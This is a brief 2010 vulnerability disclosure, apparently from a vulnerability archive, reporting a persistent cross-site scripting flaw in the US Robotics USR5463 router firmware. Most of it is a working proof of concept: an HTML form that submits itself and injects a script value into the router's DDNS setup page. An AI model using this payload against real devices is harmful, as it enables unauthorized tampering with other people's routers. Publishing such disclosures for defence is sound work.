Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23893
HistoryMay 21, 2010 - 12:00 a.m.

XSS bug in US Robotics firmware USR5463-v0_06.bin

2010-05-2100:00:00
vulners.com
35

Hi!

This bug was finded in the USR5463 802.11g Wireless Router.

<!–
Author: SH4V
BUG: permanent XSS
Firmware: USR5463-v0_01.bin - USR5463-v0_06.bin
Router: USR5463 802.11g Wireless Router
Company: US Robotics
Just change http://192.168.2.1/ by your current gateway.
–>
<form action="http://192.168.2.1/cgi-bin/setup_ddns.exe&quot; method="post">
<input type=hidden name="ddns_domainame" value='"><script>alert(1)</script>'>
<input type=hidden name="ddns_account" value=''>
<input type=password size=1 name="ddns_password" value=''>
</form>
<script>document.forms[0].submit()</script>

Regards,

David K.